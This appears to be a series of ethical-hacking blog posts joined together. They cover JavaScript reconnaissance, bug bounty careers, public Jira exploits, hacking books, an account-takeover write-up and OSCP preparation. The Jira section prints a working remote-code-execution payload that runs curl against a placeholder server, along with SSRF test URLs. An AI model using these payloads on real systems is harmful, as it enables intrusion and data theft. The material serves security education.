For example, by simply enumerating the code for API endpoints, you can find some unprotected ones. If you want to learn a real-world example of how I found a serious account takeover flaw, make sure to read this article.
While you are looking through the code for hard-coded credentials and API endpoints, you will naturally get a feel of the structure, the coding style and what the web application does. If you don’t get that, don’t worry, it comes with practice; the more you do it, the easier it becomes. We will explore shortly how you can start doing it.
You can use various tools that will assist you during this exercise. These are the ones I found helpful, but if you prefer other tools, feel free to suggest others in the comments.
To do that, you right-click on your target root entry in the Sitemap, then choose the Find scripts option under the Engagement tools in the contextual menu.
From there, you click on Export scripts and choose a file to store them. I like to store them because I will be using the next tools to look for specific things, like endpoints, secrets, etc.
waybackurls target.com | grep "\\.js" | xargs -n1 -I@ curl -k @ | tee -a content.txt
First, you install it using pip: pip install jsbeautifier. Then, you run it with js-beautify -o outfile.txt scripts.txt. This will output the file outfile.txt which you can easily browse through.
It’s time for the next step: finding the juicy data we are all looking for!
Look for keywords across the entire website
In Chrome, you can open the Developer Tools using the shortcut Command + option + I on Mac, and Ctrl + Shift + I on Windows. From there, choose the Sources Tab. Once inside, you will see the different files in a tree on the left. Hit Command + option + F on Mac, or Ctrl + Shift + F on Windows and a search menu will appear in the bottom. Type the keywords you found from the previous steps to locate where exactly they appear in the client-side source code.
From there, hit Command + F on Mac or Ctrl + F on Windows and look for your keyword, such as api_key.
Once the client-side code hits your break-point, you can debug it like you would do in any Code Editor using the controls you have on the menu in the right.
PostMessage DOM XSS vulnerabilities
Exploit a token leak to disclose your Paypal password
In this exhaustive guide, you will find all you need to know about bug bounty hunting based on my experience as a bug bounty hunter and a triage analyst who handled tens of thousands of bug bounty reports. We will explore the bug bounty history and its ecosystem, understand what to expect,
Imagine a world where companies come to you and ask you to hack them. In return, they will pay you whenever you find a unique vulnerability. And the best part, you don’t have to neither leave your home nor stick to a time schedule! It sounds unrealistic, right? Well, let me tell you that it’s now a real job, not a fantasy anymore!
When bug bounties didn’t exist
Let’s travel 50 years back. Home computers barely start entering the market. Phone phreaking at its golden age. Hackers painted as cybercriminals and weird people who think outside the norm to cause trouble. The US government passes laws which make it a crime to break into computer systems. I wasn’t yet born, and I’m honestly grateful for that. Unfortunately, companies neglected hackers and continued bringing products to the world without proper security testing. The situation got to a point where the real cybercriminals saw benefits in compromising the vulnerable companies, and hacking companies they did!
Bug bounty programs to the rescue
Luckily, some major companies felt the need to embrace the hacker spirit and leverage the hacking skills of independent individuals.
The birth of the “bug bounty” term
Back in 1995 the Netscape Communications Corporation company came up with the term “bug bounty” for the first time. Do you remember the Netscape browser? You probably don’t, but it’s the grandfather of modern Web Browsers like Chrome and Firefox. Well, back in the days, the company launched a bug bounty program for the Netscape Navigator 2.0 Beta browser. We had to wait for about 15 years before major companies started creating their own programs. We are talking about Google and Facebook in about 2011. Yahoo! Followed in 2013.
Early baby steps
However, this model had its limitations due to the fact that those programs weren’t mature enough.
First, the rewards were as modest as a t-shirt! Don’t get me wrong, I have nothing against t-shirts, I was so grateful to receive one from SoundCloud after I found a bug, but let’s just say that there are many other factors which drive hackers. According to the 2020 HackerOne Hacker report, 53% hack for money.
Secondly, the programs were limited to only a few companies, meaning that hackers didn’t have enough choice. You either hack Facebook or go to jail hacking others. And this is a big downside because 68% of bug bounty hunters hack for the challenge and the opportunity to learn, according to the same report.
Last but not least, hackers didn’t have a middleware party to defend their bugs if the program didn’t play fair. This doesn’t happen very often, but it can lead to surprising outcomes. In 2013, a hacker wrote a poorly-written report to Facebook about a bug which allowed an attacker to post on an arbitrary Facebook user’s timeline. When Facebook didn’t acknowledge the vulnerability, he then posted a message on Mark Zuckerberg’s timeline. Consequently, he wasn’t eligible for a reward. This is a common issue; when working as a triage analyst at HackerOne, I can’t count the number of poorly-written reports that I had to handle. But of course, it’s not an excuse not to give it enough analysis time and honor the hacker’s effort.
But, why become a bug bounty hunter while you can do penetration testing?
Bug bounty vs Penetration testing
Both bug hunting and penetration testing help secure organizations. However, each one differs from the other in many fundamental aspects. So, if you are a penetration tester who wants to apply the same tactics in bug hunting, you will probably fail. Similarly, if a company organizes a bug bounty program the same way you do in penetration testing assignments, you will probably fail as well. Here are some key differences that you should take into account.
The time factor
A bug bounty program usually runs for years, compared to penetration testing which spans a couple of weeks at most. Besides, there are no limitations for testing outside business hours. As a bug bounty hunter, this means you have all the time to hack as long as you want, without the need for a deadline. Therefore, your tests would be different than a typical penetration test. Usually, bug bounty hunters stick with one or two programs for months, or even years, depending on how big the scope is.
To me, bug bounty hunting is a marathon, while penetration testing is a sprint.
Bug bounty programs don’t accept some vulnerabilities
This is an important factor to consider, especially for penetration testers who are new to bug hunting. In fact, you can easily report informative issues like weak SSL ciphers, verbose errors, etc. In bug bounty programs, these issues are almost always explicitly out-of-scope in the program’s policy.
The money factor
Money is a key difference between bug bounty hunting and penetration testing. Companies pay penetration testers for the entire mission, while bug bounties are paid per valid vulnerability. Therefore, you have to be efficient or you will waste your time. This doesn’t mean that penetration testers are not efficient, quite the contrary. In fact, they can successfully handle simultaneous projects and find great security vulnerabilities. The point is … you must focus on impactful vulnerabilities and stay away from informative bugs if you want to get bug bounties.
The rise of Bug bounty platforms
With all the limitations that traditional bug bounty programs suffered from, there was a need for middleware in the cybersecurity market to help hackers and companies collaborate with each other. Naturally, bug bounty platforms were born to shape a new era in cybersecurity. HackerOne and Bugcrowd were among the first players, but we’ll leave details about each one to another episode. However, they all share pretty much the same core features.
Gamification of hacking
Hacking with bug bounty platforms is like playing a video game. We find vulnerabilities and increase our metrics, which increases our ranking in the leaderboard and opens the door to new programs, new challenges and new experiences. The best part is that we get paid along the way. Programs also get rated, the more active and rewarding they are, the more luckily talented hackers will help them stay secure. It’s a win-win situation.
Bug bounty challenges
More and more companies are joining bug bounty platforms, and so it is for people who want to hack. The problem is that not many of them have proper hacking knowledge. It’s easy to see how this is unbalanced. In fact, a bug bounty ecosystem relies on the abundance in both good programs and talented hackers. That’s why those platforms are developing more and more educational content in the form of videos, mini-challenges and CTFs. An example of that is the LevelUp conference which Bugcrowd organizes each year. It hosts talks from great hackers who share updated hacking knowledge. Another example is HackerOne’s hacktivity and the hacker101 website where Hackerone publishes new disclosed reports and provides a free playground for hackers to solve challenges and get private invites.
Bug bounty events
Another interesting advantage those platforms bring to the table is live hacking events. They gather the best hackers for a weekend to hack a target onsite. It’s a great experience which brings people together and produces new meaningful relationships. I once received an invitation but I turned it down due to some family health struggles I was going through. It was a big disappointment for me not to attend it, but I didn’t have a choice in that situation. Personally, family comes first.
The Bug bounty community
So far, bug bounty platforms are emerging and they are doing a great job at educating the next generation of hackers. Hunting for bugs has become a trend of its own and the community is growing so fast. In fact, about a third of the hacking crowd have less than 2 years of experience according to the HackerOne Hacker report of 2020. Naturally, the community started building its own knowledge base. New blogs, YouTube channels, live streams and podcasts started bringing even more educational and entertaining content. Allow me to talk about three valuable things that the community has produced.
Bug bounty methodologies
Hacking is an Art, each hacker has a perspective, a set of skills and experiences which shape the methodology he or she follows when approaching a target. Consequently, it is so easy to get lost in the number of clever methodologies out there. Jason Haddix was one of the early hackers who shared his bug bounty methodology, which is now at its 4th version.
Bug bounty tools
Every craftsman is nothing without a proper toolbox, and hackers are no exception. The bug bounty community is producing so many tools that you will have a hard time tracking. By the way, that’s a major reason why Jason’s bug bounty hunting methodology has been revised four times since 2015.
Bug bounty books
For those who enjoy reading, there are many books which will teach you just how to get into the game of bug bounties. One of the first ones was Peter’s Web hacking 101. I downloaded a free copy when signing up with HackerOne, and boy was it helpful! Shout out to Peter Yaworsky from here!
Bug bounty is proving its spot in the cybersecurity market, that’s for sure. It is becoming another way of securing companies through an increasing crowd of hackers. It is useful in many ways.
Bug bounty money
The rise of bug bounty platforms and the increasing public breaches led to a significant increase in the rewards. I receive now and then emails from HackerOne telling me that a program has increased their rewards either for a promotion period or indefinitely. In one live hacking event, payouts surpassed a Million dollar amount! Think about that! A million dollar in just three days!
Freedom and flexibility
Bug bounty hunting allows hackers to live the working lifestyle they feel comfortable in. All the work is done remotely, except for live hacking events, which due to the Corona Virus, has also gone online. We can work alone or collaborate. Flexibility to work late at night or early in the morning is a great benefit. We also can choose from a wide range of programs depending on our preference. Although the majority prefers to make a side hustle income, around 20% work as full-time bug bounty hunters.
Bug bounty hunting is not just all about making money. In fact, hackers build relationships and expand their friendships and professional network. The bug bounty community is generally open-minded with a young heart. People here are curious, fun and hard-working. We support each other in case someone goes through a hurdle, like a burnout (more on this shortly). Overall, I’d say I’m grateful to be part of such a great community.
Bug bounty drawbacks
Bug bounties cannot be that perfect, can they? There are downsides as well. I feel I’m responsible to put your expectations into perspective and give you a heads up before you leave your job and start hunting for bugs. Bug bounties, like any other thing in this life, has its drawbacks as well.
When we hunt for bugs, we only get bounties when we are the first to find one, that’s just how it is. This rule brings a great deal of income instability because it generates frustration and fear. Even talented hackers can hunt for days, or even weeks, without finding a single bug. Imagine how frustrating this can be! That’s why the majority prefer to hack part-time.
Isolation and comparisons
Because bug bounty hunting is commonly remote, we are not limited to an office. Some hackers travel the world while hacking. Others prefer to enjoy hunting from the comfort of their couch at home. However, since we don’t have to work with a team, we can sometimes feel lonely. And when we don’t find vulnerabilities, it gets even worse, especially when scrolling the Twitter feed and finding many tweets of others who find bugs and get paid.
Depression and burnout
The aforementioned drawbacks help prepare for the coming of the scariest ghost, the darkest nightmare of all bug hunters, the most wild beast which we call the burnout. You know, the feeling when you work continuously without any results, you lock yourself in front of your machine, you hack day and night and all you see are others finding bugs. Therefore, you lose your confidence and hope doors suddenly get closed. And then the time comes, and you decide to stop everything and never get back to hacking again.
That’s why it is important to pay attention to your mental health while working as a bug bounty hunter. We will talk about that on a dedicated episode. Meanwhile, you can read what other bug bounty hunters think about it.
Bug bounty programs
Bug bounty programs are your clients, and you should treat them as such. In other words, you have to respect their security policy, deliver high-quality reports and assist them on any need for information. If you consider these points, they will love you!
In bug bounty, there are two types of programs: public and private.
Public programs are, as the name suggests, accessible to all bug hunters. You can send security reports through a bug bounty platform or directly through their suggested communication channel, which you can find on the main domain under the /.well-known/security.txt file.
Public programs tend to have a big scope, which makes it a good target for long-term hacking commitment. However, you first need to assess if they have good response metrics. Otherwise, you will have to wait for months to get your reports handled, and yet other months to get a reward if the program provides bug bounties. You can gauge their response by sending some low hanging fruits which are still impactful, like a reflected XSS.
Private programs are only accessible through private invites from bug bounty platforms. When you reach a certain level of reputation, you start to get them.
In general, these have a small number of hackers compared to public programs. Besides, they usually get help from the triage analysts of the bug bounty platform to reduce the noise of invalid reports. Moreover, the scope varies from wildcard domains to a single web application. Finally, they generally have good response metrics and pay well, which makes it attractive to talented hackers.
However, I would say that competition is higher in private programs than in public programs. Although the number of hackers is smaller, you have to work harder to uncover deeper bugs which have been overlooked by the previous testers.
Which is better, private or public programs?
In my opinion, it really doesn’t matter! Whether you hack on a public or a private program, you will always find bugs because code never stays the same! Every day, developers write and commit new lines of code, which means new opportunities for bugs to surface.
As long as you have the hacker hunter spirit, I guarantee you success.
How to be a successful bug bounty hunter?
Nowadays, there are so many bug bounty platforms, which host so many programs. This means that bugs are growing in number as well, you just have to develop some patterns to be able to find them.
A bug bounty hunter is a hacker
That’s obvious, but there are so many bug bounty hunters who honestly don’t understand the vulnerabilities that they are looking for. They have the spirit of script kiddies who care only about exploiting vulnerabilities, and a lot less about knowing enough about them.
You must have the spirit of a hacker, meaning that you should be curious how the technology works, and why the bug exists and how to exploit it. Then learn as much as you can about it. That way, you will not only exploit bugs but also develop methodologies about how to look for them.
A bug bounty hunter should have discipline and be consistent
This is one of the most challenging things you have to overcome. In fact, you won’t be paid until you find a bug, so might end up wasting a day, a week or even a month or more without finding anything.
If you hack for money, it might get you a painful burnout, which I already covered separately. Alternatively, if you have a full-time job and a family, it might be challenging to find that sweet spot to hack in your free time. No matter what your situation is, you have to be consistent.
Consistency should also be applied to acquire new knowledge. I suggest you take advantage of the many bug bounty resources to stay up to date.
A successful bug bounty hunter has a methodology
This is a direct result of consistency; the more you hack, the stronger your mind muscles grow. Therefore, you will find yourself following a pattern of tests which will improve over time. Ultimately, this will increase your chances of finding unique bugs.
A bug bounty hunter is nothing without a proper toolbox
You have to choose your tools carefully. They should be flexible, simple to use, quick, contain less bugs, etc. Unfortunately, you can’t meet all the requirements. Therefore, you can combine multiple tools, or develop your own.
The bug bounty community offers so many great tools that you should use. I tried collecting the most famous ones in one article, but there are so many emerging tools. You have to keep sharpening and updating your tools if you want to be a successful bug bounty hunter.
A successful bug bounty hunter focuses on few bug bounty programs
If you keep jumping from one program to another, you will only find shallow bugs if you happen to come across a fresh code. Otherwise, there is a high chance you won’t find any bug.
Instead, choose a few programs which have good response metrics, pay fair money and are in line with your taste. You will find deeper bugs this way. Additionally, you will feel less overwhelmed.
A bug bounty hunter writes good bug bounty reports
It’s not all about your technical skills. In the end, you will interact with humans to sell your bug at the highest price. Unfortunately, you can’t do that with poor reports.
You have to understand that your report is the only value you give to the bug bounty program. If you write it well, they will spend less time reproducing and validating the issue, they will quickly triage and reward you. Plus, they will love you and might give you a bonus for your quality report. Read about that in a full article dedicated to this subject.
Some bug bounty hunters use automation for assistance
This is where few hackers shine because they know how to build code, not just break it. If you want to level up your game in bug bounty hunting, you have to automate tasks to enumerate your targets, monitor new domains, assets and changes in the programs you hack on.
If you are barely starting in the infosec industry and want to start doing bug bounties, I recommend you check out the OWASP Top 10 vulnerabilities in practice, which is a guide to the basics of web application security testing.
I’ve been asked a lot about Jira vulnerabilities. In this article, I compiled the publicly available Jira exploits I could find to help you when you are doing bug bounty hunting or penetration testing.
However, I should mention that you need to have some basic understanding of how web applications work and how to exploit them. If you want to learn that, head over to this ultimate guide.
This Jira vulnerability created havoc back in 2019 and all bug bounty hunters were looking for it. It exploits the way input was handled in the administrator contact form. It allows remote and unauthenticated users to run Remote Code Execution on the vulnerable Jira instance. To achieve it, follow the steps:
Go to /secure/ContactAdministrators!default.jspa. If you get a form, continue to the next step.
Input $i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime',null).invoke(null,null).exec('curl http://your_server_here/rcetest?a=a').waitFor() in the subject and request details.
Send the form. If it’s vulnerable this Jira attack will trigger an HTTP request to the server you set within the curl command in the payload above.
If you are doing a penetration test, urgently reach out to your point of contact. And if you are doing bug bounty hunting, stop there and submit a detailed report about the issue.
Security misconfiguration in the Jira Service Desk
This Jira attack exploits a misconfiguration in the Jira Service Desk being exposed to the public. It allows an attacker to gather emails of employees and create Jira tickets. What’s better than to read it from the hacker who discovered it. Inti wrote an exhaustive article about that, so make sure to check it out.
Here are the steps to follow if you want to
Go to /servicedesk/customer/user/login
See if you can register an account and create a ticket as a proof-of-concept.
Publicly available filters and dashboards
This Jira attack exploits, yet again, another Security misconfiguration. And it allows attackers to leak internal data from the vulnerable Jira instance because of how filters can be publicly exposed by default. Within the accessible pages, there is the user picker which discloses a list of internal users. You can read about the details in this article.
The following URLs are the ones you should try, see if you can access a list of users/resources inside the exposed filters:
This classic Jira attack exploits an SSRF vulnerability, which allows you to do what SSRF does: Read AWS instance metadata, pivot inside the internal infrastructure or trigger XSS. You can read more about SSRF here.
Here are the steps to test for this Jira vulnerability.
Go to /plugins/servlet/oauth/users/icon-uri?consumerUri=https://www.google.com
You should load the Google page within the vulnerable Jira instance.
Stop there and report the bug, asking permission to escalate it.
This Jira attack exploits the same vulnerability type as the one before, but in another endpoint which was implementing some poor validation. The bypass is simply appending @target.domain to the vulnerable parameter, target.domain is the page you want to load, such as AWS instance metadata. You can find the details in this article published by Tenable.
Here are the steps to follow if you want to test for it:
Go to /plugins/servlet/gadgets/makeRequest?url=http://vulnerablehost@<http://targethost.com>
You will get the results from targethost.com
Jira is one of the famous issue tracking products and it has its share of vulnerabilities. If you are an ethical hacker, use this list as a testbed during your engagements. If you are a system administrator and have a Jira instance, make sure you have the latest version and that you properly configure it. That way, you will reduce the attack surface.
Hello Ethical Hackers! Today I share with you the best hacking books I enjoyed reading since the beginning of my career in Information Security! I will constantly update the list as I read more, but you already have enough hacking books to get you started in the information security industry. It also contains some advanced hacking books for those who want to level up their hacking skills.
This content uses referral links. You can choose to support me while I continue delivering more and more hacking content. With that said, let’s dive right into the first hacking book!
This is a hacking book for bug bounty hunters. Peter Yaworsky introduces bug bounty hunting to beginners and pragmatically explains the different vulnerabilities. For each vulnerability, he gives examples of reports from Hackerone’s Hacktivity, which is where HackerOne‘s bug bounty reports get published. I talked about in a previous episode. At the end of the book, he shares a bug bounty methodology using well-known tools.
It is the first hacking book I read when I started doing bug bounty hunting. You can get a free copy when you register an account on HackerOne. You can read it in one day! If you are a beginner in the bug bounty field, give it a try. You won’t be disappointed!
This is the first hacking book I have ever read about penetration testing, and boy was it helpful! If you have limited knowledge and want to kickstart your hacking skills, this is a must-read. I had practically zero knowledge of ethical hacking and penetration testing, but this hacking book opened my eyes wide open!
It teaches penetration testing as a methodical approach, explaining each step at a time. During each phase, you will learn the different concepts, tools and techniques that every penetration tester uses in real-life engagements.
If you want to learn and practice low-level programming and exploitation of buffer overflow vulnerabilities, this book is for you! I remember tackling the Buffer overflow challenges on root-me, and this book gave me a strong boost! I was able to easily understand how they work, what protections usually mitigate them and how to bypass those mitigations as well!
In fact, it starts easy and covers programming in C and bash scripting. It explains various communication protocols and how to interact with them. But the meat of the book is Buffer Overflows. The author has great teaching skills that will make you understand the concepts behind buffer overflow before you know it! It illustrates them with simple examples that you can replicate using the Live CD that comes with the book.
When I barely started exploring the world of hacking, I came across Kevin Mitnick, dubbed as “The Most Wanted Hacker”! I wanted to know how he earned that fame, so I read this book, which is an autobiography. Throughout the thrilling chapters, Kevin Mitnick tries to rehabilitate his image by explaining the details of his hacking journey. They include why and how he hacked many companies, how he has been monitoring the FBI agents who followed him, how he hacked the prison’s phone system and how he has faked his identity many times.
It’s not a hacking book in the sense that it doesn’t teach technical concepts, but it is a great read full of thrilling moments if you want to explore the inner-working of a hacker mindset. Plus, the reader will learn why hacking outside the law can be troublesome!
This hacking book is the bible of web application hacking. If you seriously want to learn how to hack web applications, this book is a must. I read it two times, and let me tell you that it’s so heavy! It presents different angles to attack every web application. Throughout the book, the authors illustrate some real-world examples, present different payloads and explain the hacking concepts in a very detailed way. From application mapping to Business Logic errors, you will learn it all! I suggest you take the time to read and grasp each chapter. Also, take notes while reading as it would help you remember where each topic is located when you want to revisit it. And trust me, you will have to revise it!
This is another hacking book of Kevin Mitnick where he narrates some mind-blowing hacking stories! If you want to explore how creative hackers can get and how far they can go, then this is a must-read! I read it two times because it is so entertaining, educating and thrilling at the same time.
Perhaps the most epic stories I enjoyed reading were the Casino Jackpot hack and the Stealing of a huge Software from outside. Both stories contain so many creative ways of breaking into a system, but I won’t spoil it for you! Give it a read and tell me which stories you have enjoyed the most.
This hacking book covers many hacking tactics used by cybercriminals, but also by advanced ethical hackers during an engagement, especially red team ones, which have wider scope and allow more freedom for ethical hackers to simulate advanced attacks.
I liked the fact that it draws different scenarios for attacking a fictitious bank, which greatly increases its content value. In fact, it breaches the perimeter both using a phishing campaign and hacking the external servers. To add more value, it starts with the tactics you can perform to stay anonymous. When I read this hacking book, I immediately remembered the Software story from the Art of Intrusion book I mentioned earlier. Only this time, I’m witnessing the hack in a very technical perspective.
Throughout this awesome hacking book, you will get to learn the thinking process of a determined hacker as he or she slowly, but surely, infiltrates a fictitious bank IT infrastructure. You will also discover the different hacking tools that can be used for each phase of the engagement.
Hello ethical hackers! Today I share with you an account takeover I achieved during a recent penetration testing of a web application. For those who don’t know know what an account takeover is, there is a dedicated section for that. From there, I will explain how I enumerated all the endpoints. Then, I will walk you through the steps I took to gain access to the highest privilege account. It is going to be a fun and rewarding episode, so stay with me until the end!
Account takeover definition
Account takeover happens when an attacker, with low or no privileges, can take control of another account without authorization. For example, you can find customer account takeover in e-commerce platforms or any other service which manages user accounts.
Is account takeover a vulnerability?
I see account takeover qualified as a vulnerability. However, I don’t think this should be the case. In fact, I tend to describe it as a result of one or more vulnerabilities. Just like a data breach can be the result of a SQL injection vulnerability.
Account takeover scenarios
Based on the distinction we have just set between vulnerability and its outcome, many vulnerabilities can lead to account takeover. For example, you might have an open redirect vulnerability which leaks the user token upon login. In this scenario, an attacker can take over the victim’s account by simply clicking on a malicious link. There are many reports demonstrating account takeover on HackerOne’s Hacktivity, so make sure to check them out.
In the remaining of this episode, the scenario involves unauthenticated endpoints which, once combined, result in a full account takeover without user interaction.
Since this application had a separate front-end, I collected all the API endpoints. It is a tedious task, but it’s rewarding in the long run. I found many endpoints, but the most interesting ones were the user sign up feature, password resetting based on the user identifier and account listing based on the user email. You will see why shortly!
Before account takeover
Before I found how to achieve account takeover, I first tested the endpoints I collected earlier. During application mapping, there was a registration form which returned an error. I thought maybe it’s broken and I moved on. However, I now understand what’s happening.
The debug interface
It turns out that the application sends a confirmation email to the user. However, the mail server was down. Besides, the sign up requires approval from an employee. How did I know that? Well, I found a debugging portal on another port on the server which disclosed all the operations, including the back-end responses. One of them contained a mail server connection error, and another one returned the ID of the newly created user, which means that it has been successfully created, but not yet active.
Bypassing the approval step
If you recall, I mentioned earlier that I found a password reset API endpoint that uses the account ID. Guess what, I have the new user ID. So I quickly send the request. To my surprise, the response is positive and I can now log in as the new user without approval from an internal employee! As a bonus, I have a limited admin role, which is not as powerful as the System Admin, but it’s a good start to hunt for the ultimate account takeover. Sadly, the user identifiers were long and random, also known as UUIDs. Therefore, I needed a way to enumerate them.
Information disclosure to the rescue
Inspecting the debugging portal reveals exhaustive details about this specific feature, including the SQL query, which happened to be using the LIKE operator in the WHERE statement. The SQL query resembled something along the line of select email from user where email LIKE ?. Although there is no SQL injection, I can still use the percent character %, which returned the entire users from the database! A massive information disclosure!
System admin account takeover without interaction
We now have all the ingredients to get that System Admin account. Matter of fact, I didn’t know there is one until I dumped the entire database with that information disclosure vulnerability. I now have the System admin ID, which I use to reset the password, therefore achieving full account takeover of the System Admin user.
In terms of the impact, I essentially got full access to the application as the highest role possible, without any interaction from the victim.
Hopefully, you learned a trick or two on how to achieve account takeover during a web application penetration testing using a black-box approach.
Account takeover is one of the biggest security flaws. Depending on the level of access, attackers can compromise the entire web application or even the whole infrastructure. If you are a developer, I hope you learned why you must always implement authentication and access control on privileged endpoints. Besides, I recommend you request a penetration testing early in the development life cycle. That way, you will avoid any design flaws or business logic errors that will become expensive to patch later.
Hello ethical hackers! In this episode, you will learn everything related to OSCP certification. What is OSCP? Why is it a strong certification? What sets it apart? What are the requirements? How to properly prepare for the exam? What to do the day of the exam? And what’s next once you earn your OSCP certification?
OSCP Certification introduction
OSCP stands for Offensive Security Certified Professional, it is Offensive Security‘s most famous certification. Everyone in the industry respects it, and for good reason. In fact, it proves that its holder can perform a penetration testing assignment using a methodical approach and can write a professional pentest report to deliver to the client. Moreover, it demonstrates that its holder can work under pressure and think outside the box when conducting penetration testing. By the way, the motto of OSCP is Try Harder!
OSCP Syllabus, course material, the lab and more
This certification has a syllabus that covers key aspects of penetration testing, it comes with the PWK course, a lab for training and a video package to support the course.
OSCP covers many penetration testing areas, from information gathering to exploitation. You get to apply your knowledge on various Linux distributions and Windows versions. These machines run a plethora of services. But perhaps the most important aspects I really enjoyed learning was SSH tunnels, privilege escalation and buffer overflows.
With the new 2020 update, this certification offers even more value, especially with the introduction of Active Directory hacking and Empire, which are essential in most real-world infrastructure penetration testing.
PWK course and videos
You won’t pay for the certification voucher only, the price covers the PWK course, which is a PDF file that goes from the basics to the advanced hacking techniques throughout the different chapters. You will learn some Linux commands to work in the terminal, most of the basic web application vulnerabilities, basics of buffer overflow, Active Directory hacking, SSH tunnelling, etc. Each chapter or section comes with a set of exercises that help you apply your knowledge. Besides, if you join the solutions to your final report, you will get 5 extra points.
To support the course PDF, you will get a set of videos that go through the whole concepts in the PDF and demonstrate the concept in practice.
The OSCP lab, price and why I chose it
When I wanted to get certified, I had many certification options. However, I chose OSCP because it provides many key points I was looking for:
It has a hacking lab to practice the course material: I love learning through practice and the lab in the OSCP course is amazing. You will have to breach the perimeter, then work your way through until you own the entire infrastructure.
The exam involves performing actual penetration testing on a new lab and write the report: I wanted to get a great value for the price I am paying and the OSCP exam is also practical, which means that I will apply what I have learned in yet another lab.
With the previous points, the price is reasonable compared to other certifications.
It is respected in the security community: This is reflected in both job offers and the salary. Almost all security offers from junior to senior level include OSCP among the other security certifications. This means that you don’t get a piece of certifying paper, but you actually increase your value in the job market.
Alright, now that you have a general view of what the OSCP is, let’s see what do you need to get it.
OSCP requirements before you apply for it
Although you don’t need prior hacking knowledge to go through this certification, I highly recommend you get comfortable at lease with the basics. OSCP is not for the faint of heart. If you under-estimate it, I doubt you will stand for long.
These are the things I recommend you learn:
Get yourself comfortable working with the terminal
You will spend most of your time on the lab working on remote machines which are only accessible through SSH. Even the Windows machines won’t be exploitable unless you use the command prompt to run your exploitation scripts. Therefore, it is essential to learn at least the basic Linux terminal commands that will help you navigate through the filesystem, install software, copy files around and connect to remote servers.
Learn the basics of web
There is a considerable amount of web applications in the lab, so I advise you to learn how they work. Take your time to understand how the HTTP Protocol works, what is the difference between the client and the server, etc. This will ease your way through the course as you will already have a general view of what they are talking about.
Learn and practice basic hacking techniques
Although the OSCP course teaches you the hacking techniques and concepts from the beginning, I recommend you learn them beforehand. That way, you can quickly go through them and focus on more advanced concepts like exploit development, SSH tunnelling and looting all the machines in the lab. There are many hacking websites which will help you achieve that. They offer great challenges that you can play with, solve and learn along the way. Feel free to read the dedicated article about it.
Practice your skills on boot2root machines
Once you feel comfortable with the hacking challenges, I encourage you to take more time to root some machines. This will allow you to adapt to the kind of hacking activity that you would find during the OSCP lab and the exam. The article I mentioned earlier contains a list of the websites where you can achieve that.
Code something with Python
Many exploits are available in python, and sometimes you will have to modify them to work for your situation. Therefore, knowing Python will help you take full advantage of the labs and speed up your hacking process. Besides, since Metasploit is forbidden in the exam apart from one shot, you have to convert one or two modules to your own Python scripts as a means of practice during your exam preparation.
Understand basic C code
The OSCP course contains a full chapter on Buffer Overflows. Although the concepts are basic, you will still have a hard time understanding and building your exploits if you don’t know anything about the C language. Besides, some machines require you to customize some C code in order to successfully exploit the vulnerability.
The process of applying for OSCP
Do you already have what it takes? Good! You can apply for it online and receive your package. You have three options, either 1, 2 or 3 months of lab access. I recommend you take the 3-month package so that you give yourself enough room for practice.
Expect to present a proof of identity and to use a corporate email. If you don’t have the latter, you can contact the support and tell them that you have no corporate email.
Once the payment is processed, you will get your package containing the course PDF, videos and the VPN access for the lab.
OSCP preparation for the exam
Preparation for the exam starts right when you receive your course material. See, there are some key points I want you to know from the beginning.
Do the course exercises and document them as you go
You will feel lazy solving the exercises and documenting them as you go through the course, but it’s a crucial thing to do. See, documenting your progress and taking notes is a soft skill that you should have if you want to develop quickly. It has two benefits, the first one is that you will secure your extra 5 points in case you need them to pass the exam. Secondly, you will develop the habit of taking notes, which will help you during the exam. Which brings us to the second advice.
Take organized notes
You don’t want to redo all the exploit research, rebuild all your exploits or start Googling how to transfer files between machines during the exam. Everything should be noted beforehand. Your exploits should already be built and organized. Your payloads should be well structured. This will save you tremendous time during the exam.
Take your time to root all the machines in the lab
I recommended you to apply for 3 months of lab access so that you give yourself enough time to grasp, practice and hone your hacking skills on the lab. A friend of mine had a full-time job, a family and purchased one month. Although he was really smart and had already the skills, he simply couldn’t keep up with so many duties on his plates.
Once you root all the lab machines, I think you will be ready for the exam. It’s not a requirement, but I highly recommend you do it first.
As you might have already known, the OSCP exam is 24 hours long and you have to score at least 65 points to pass. I say 65 because you can send the exercises solution along with the exam report and get 5 extra points, which would complete your minimum 70 points to pass the OSCP exam. You won’t have to pivot between the machines though, each one is separate.
Here is a list of tips that will help you the day of the exam:
Revise your notes
You should have all your notes at your hand. That’s when your prior preparation and documentation will pay off. The notes should contain your code snippets for various tasks such as connecting to different services, transferring files using different methods, bind and reverse shells, your exploits already built and grouped by target OS, etc.
Don’t upgrade your Kali machine
Just work with the version you had throughout the course. Upgrading your machine can introduce surprises that will force you to waste your time troubleshooting instead of solving the exam challenges.
Take regular breaks
You can’t stay productive the entire exam without food and good hydration. So, reserve some time for breaks, it will make you feel better, refreshed. Sometimes, all you need is another perspective, which you can’t get when you are stuck in front of the computer. You just have to notify the proctor, as explained in the official FAQ section.
Start with the Buffer Overflow challenge
One of the machines contains a buffer overflow vulnerability that you will be able to solve without problems if you had solved the one in the course. I recommend you start with it first. This will boost your confidence to tackle the remaining ones.
Hopefully, you are now certified OSCP, congratulations! You have proved that you “tried harder” and you now have the skills required to conduct penetration testing in the real world. However, this is not the end of your journey and you are certainly not an expert. OSCP is a great beginning for a bright future in penetration testing, so don’t waste it! Think about niche areas you want to focus on. For example, you may want to learn more about exploit development, web hacking or Active Directory attacks. Learn the subject and pursue some certification in the field.
Other questions you may ask
OSCP vs CEH: Which is the best?
For me, the short answer is OSCP. The long answer is…it depends! See, CEH is great if you are barely starting in the infosec industry and you still want to quickly get a job even if you don’t have enough practice. In fact, it is recognized by most companies and most of the candidates would have it. So it makes sense to apply for it when you are just starting.
However, I don’t think we should compare it to OSCP. In fact, the exam is a 4 hour Multiple Choice Questions. If you want to become a CEH Master, then you have to pass the 6-hour exam which contains 20 mini-challenges. So, both challenges combined are less than 50% of the 24-hour exam challenge on the OSCP. Besides, OSCP wins at the price as well. In fact, with three months of lab access, the total price is 1349USD, compared to 1898USD for the CEH (The Multiple Choice Questions and the Practical exams, plus registration fees). In my opinion, if budget is a concern for you, you may want to apply for CompTIA PenTest+ instead.
Is a certified OSCP salary higher than CEH?
According to payscale.com, the average OSCP salary is 91,538USD, compared to 82,164USD for CEH at the time of writing this article.
Certifications are a good way to prove that you possess a set of skills, and OSCP is a great one for penetration testers. However, getting certified shouldn’t be the goal. In my opinion, the focus should be on acquiring and applying your hacking skills. That’s what counts!
